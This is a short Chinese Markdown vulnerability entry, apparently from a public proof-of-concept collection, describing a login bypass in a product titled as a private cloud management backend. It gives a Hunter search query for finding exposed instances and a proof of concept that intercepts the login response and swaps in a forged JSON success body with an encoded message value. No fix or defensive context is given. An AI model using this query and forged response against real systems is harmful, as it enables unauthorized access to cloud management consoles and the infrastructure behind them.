21 lines
502 B
Markdown
21 lines
502 B
Markdown
|
|
# 私有云管理平台存在登录绕过漏洞
|
||
|
|
|
||
|
|
私有云管理平台存在登录绕过漏洞
|
||
|
|
|
||
|
|
## hunter
|
||
|
|
|
||
|
|
```yaml
|
||
|
|
web.title="私有云管理后台"
|
||
|
|
```
|
||
|
|
|
||
|
|
## poc
|
||
|
|
|
||
|
|
登陆界面抓包改返回响应的数据
|
||
|
|
|
||
|
|
```java
|
||
|
|
{"code":1000,"msg":"BscDYP2u0qLelgSB6XT1AxbULeN55ZayHYnmPEDnib4="}
|
||
|
|
```
|
||
|
|
|
||
|
|

|
||
|
|
|
||
|
|

|